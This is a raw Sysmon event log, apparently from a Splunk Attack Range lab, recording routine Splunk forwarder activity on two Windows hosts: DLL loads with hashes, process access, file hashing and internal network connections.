17:30:29.058{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061176Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:29.058{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061183Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:30.175{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E195A2FFE554A3AFB1C7D2409785B3CB,SHA256=B23F32812C12DCC96CB5E9B8E2F04C68277152F493243ADE58D3CF921E100BC9,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530995Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:30.100{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530994Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:30.100{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C941ABB7DA7F0E035D452CA9B3DFF8D,SHA256=0E361A3EC0E73FC463469734C09D211D5E8BED816B1A5B56D0F1BA4DA62CB246falsefalse - insufficient disk space 10341000x80000000000000001061182Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:30.059{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061181Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:30.059{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061180Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:30.055{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27C00FEFA3CB87C06EDEECA3D06B8662,SHA256=33FA85B4A43A97163679A6394E75EE67042910F3F66209C105C02FEEAA19C50B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061188Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:26.222{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1300-false10.0.1.12-8089- 354300x80000000000000001061187Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:25.735{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1299-false10.0.1.12-8000- 23542300x80000000000000001061186Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:31.179{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B39127A5336AFF54C79BAC5D787E897,SHA256=740859BD3D3E5A8144758ACC515F7D7F71D74AEB667294D92E8BA0F0867C39B8,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000001531101Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001531100Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001531099Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001531098Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001531097Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001531096Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001531095Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001531094Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001531093Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001531092Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001531091Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001531090Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001531089Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001531088Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001531087Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001531086Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001531085Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001531084Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001531083Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001531082Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001531081Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001531080Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001531079Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001531078Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001531077Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001531076Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001531075Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001531074Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001531073Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001531072Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001531071Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531070Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001531069Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001531068Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001531067Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x80000000000000001531066Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.971{21761711-83AC-607D-0500-00000000BB01}412428C:\Windows\system32\csrss.exe{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001531065Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001531064Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.972{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 